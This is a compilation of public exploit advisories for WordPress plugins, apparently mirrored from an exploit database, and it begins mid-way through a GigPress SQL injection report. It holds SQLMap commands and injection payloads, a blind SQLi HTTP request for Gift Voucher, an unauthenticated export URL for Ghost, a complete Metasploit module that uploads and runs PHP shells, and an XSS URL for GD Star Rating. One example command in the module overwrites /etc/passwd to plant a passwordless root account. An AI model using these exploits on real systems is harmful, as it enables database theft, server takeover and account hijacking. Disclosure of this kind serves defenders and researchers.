   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(9266=9266,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_venue_id=1&show_related=new

   Type: AND/OR time-based blind
   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BiUm)&show_venue_id=1&show_related=new
---
[12:21:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++


(2) Authenticated SQLi [CWE-89]
-------------------------------

* CODE:
admin/handlers.php:71
+++++++++++++++++++++++++++++++++++++++++
$show['show_venue_id'] = $_POST['show_venue_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:95
+++++++++++++++++++++++++++++++++++++++++
$venue = $wpdb->get_results("SELECT venue_name, venue_city FROM " . GIGPRESS_VENUES . " WHERE venue_id = " . $show['show_venue_id'] . "", ARRAY_A);
+++++++++++++++++++++++++++++++++++++++++


* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1[SQLi]&show_related=new

SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_venue_id --dbms mysql
[............]
POST parameter 'show_venue_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_venue_id (POST)
   Type: error-based
   Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(6543=6543,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_related=new

   Type: AND/OR time-based blind
   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OzkE)&show_related=new
---
[12:23:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++


Timeline
========
2015-05-09: Discovered vulnerability.
2015-05-20: Vendor notification.
2015-05-20: Vendor response and fix.
2015-05-25: Public disclosure.
HireHackking 
# Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
# Google Dork: intext:"/wp-content/plugins/gift-voucher/"
# Date: 2018-08-23
# Exploit Author: Renos Nikolaou
# Software Link: https://wordpress.org/plugins/gift-voucher/
# Vendor Homepage: http://www.codemenschen.at/
# Version: 1.0.5
# Tested on: Windows 10
# CVE: N/A
# Description : The vulnerability allows an attacker to inject sql commands 
# on 'template_id' parameter.

# PoC - Blind SQLi :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://domain.com/gift-voucher/
Content-Length: 62
Cookie: PHPSESSID=efa4of1gq42g0nd9nmj8dska50; __stripe_mid=1f8c5bef-b440-4803-bdd5-f0d0ea22007e; __stripe_sid=de547b6b-fa31-46a1-972b-7b3324272a23
Connection: close

action=wpgv_doajax_front_template&template_id=1 and sleep(15)#

Parameter: template_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=wpgv_doajax_front_template&template_id=1 AND 4448=4448
    Vector: AND [INFERENCE]
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
banner:    '5.5.59'
HireHackking 
# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
# Date: 28-04-2016
# Software Link: https://wordpress.org/plugins/ghost
# Exploit Author: Josh Brody
# Contact: http://twitter.com/joshmn
# Website: http://josh.mn/
# Category: webapps
 
1. Description
   
Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.
   
2. Proof of Concept

http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file

File will be downloaded.
   
3. Solution:

Update to version 0.5.6

https://downloads.wordpress.org/plugin/ghost.0.5.6.zip
HireHackking 
source: https://www.securityfocus.com/bid/54440/info

The Generic Plugin for WordPress is prone to an arbitrary-file-upload vulnerability.

An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Generic Plugin 0.1 is vulnerable; other versions are also affected. 

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
  super(update_info(info,
  'Name' => 'WordPress Generic plugins Arbitrary File Upload',
  'Description' => %q{
   This module exploits an arbitrary PHP File Upload and Code Execution flaw in some
  WordPress blog software plugins. The vulnerability allows for arbitrary file upload 
  and remote code execution POST Data to Vulnerable Script/File in the plugin.
   },
   'Author' => [ 'KedAns-Dz <ked-h[at]1337day.com>' ], # MSF Module
   'License' => MSF_LICENSE,
   'Version' => '0.1', # Beta Version Just for Pene-Test/Help - Wait the Best !
   'References' => [ 
     'URL', 'http://1337day.com/related/18686',
     'URL', 'http://packetstormsecurity.org/search/?q=wordpress+shell+upload' 
  ],
   'Privileged' => false,
   'Payload' =>
    {
    'Compat'  => { 'ConnectionType' => 'find', },
    },
    'Platform'       => 'php',
    'Arch'           => ARCH_PHP,
    'Targets'        => [[ 'Automatic', { }]],
    'DisclosureDate' => 'Jun 16 2012',
    'DefaultTarget' => 0))

   register_options(
    [
     OptString.new('TARGETURI', [true, "The URI path to WordPress", "/"]),
     OptString.new('PLUGIN', [true, "The Full URI path to Plugin and Vulnerable File", "/"]),
     OptString.new('UDP', [true, "Full Path After Upload", "/"])
    # Example :
    # set TARGETURI http://127.0.0.1/wp
    # set PLUGIN wp-content/plugins/foxypress/uploadify/uploadify.php
    # set UDP wp-content/affiliate_images/
    # set RHOST 127.0.0.1
    # set PAYLOAD php/exec
    # set CMD echo "toor::0:0:::/bin/bash">/etc/passwd
    # exploit
    ], self.class)
  end

   def check
    uri = datastore['TARGETURI']
    plug = datastore['PLUGIN']
  
    res = send_request_cgi({
    'method' => 'GET',
    'uri' => "#{uri}'/'#{plug}"
    })
    
 if res and res.code == 200
   return Exploit::CheckCode::Detected
  else
   return Exploit::CheckCode::Safe
   end
 end

  def exploit

   uri = datastore['TARGETURI']
   plug = datastore['PLUGIN']
   path = datastore['UDP']
 
   peer = "#{rhost}:#{rport}"

   post_data = Rex::MIME::Message.new
   post_data.add_part("<?php #{payload.encoded} ?>",
   "application/octet-stream", nil, 
   "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")

   print_status("#{peer} - Sending PHP payload")

  res = send_request_cgi({
  'method' => 'POST',
  'uri'    => "#{uri}'/'#{plug}",
  'ctype'  => 'multipart/form-data; boundary=' + post_data.bound,
  'data'   => post_data.to_s
  })

   if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
   print_error("#{peer} - File wasn't uploaded, aborting!")
   return
   end

   print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
   res = send_request_cgi({
   'method' => 'GET',
   'uri'    => "#{uri}'/'#{path}'/'#{$1}.php"
   })

   if res and res.code != 200
   print_error("#{peer} - Server returned #{res.code.to_s}")
   end

   end

end
HireHackking 
source: https://www.securityfocus.com/bid/53527/info

The GD Star Rating plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

GD Star Rating 1.9.16 is vulnerable; other versions may also be affected.

http://www.example.com/wp-admin/admin.php?page=gd-star-rating-t2 tpl_section=&lt;script&gt;alert(1)&lt;/script&gt;&amp;gdsr_create=Create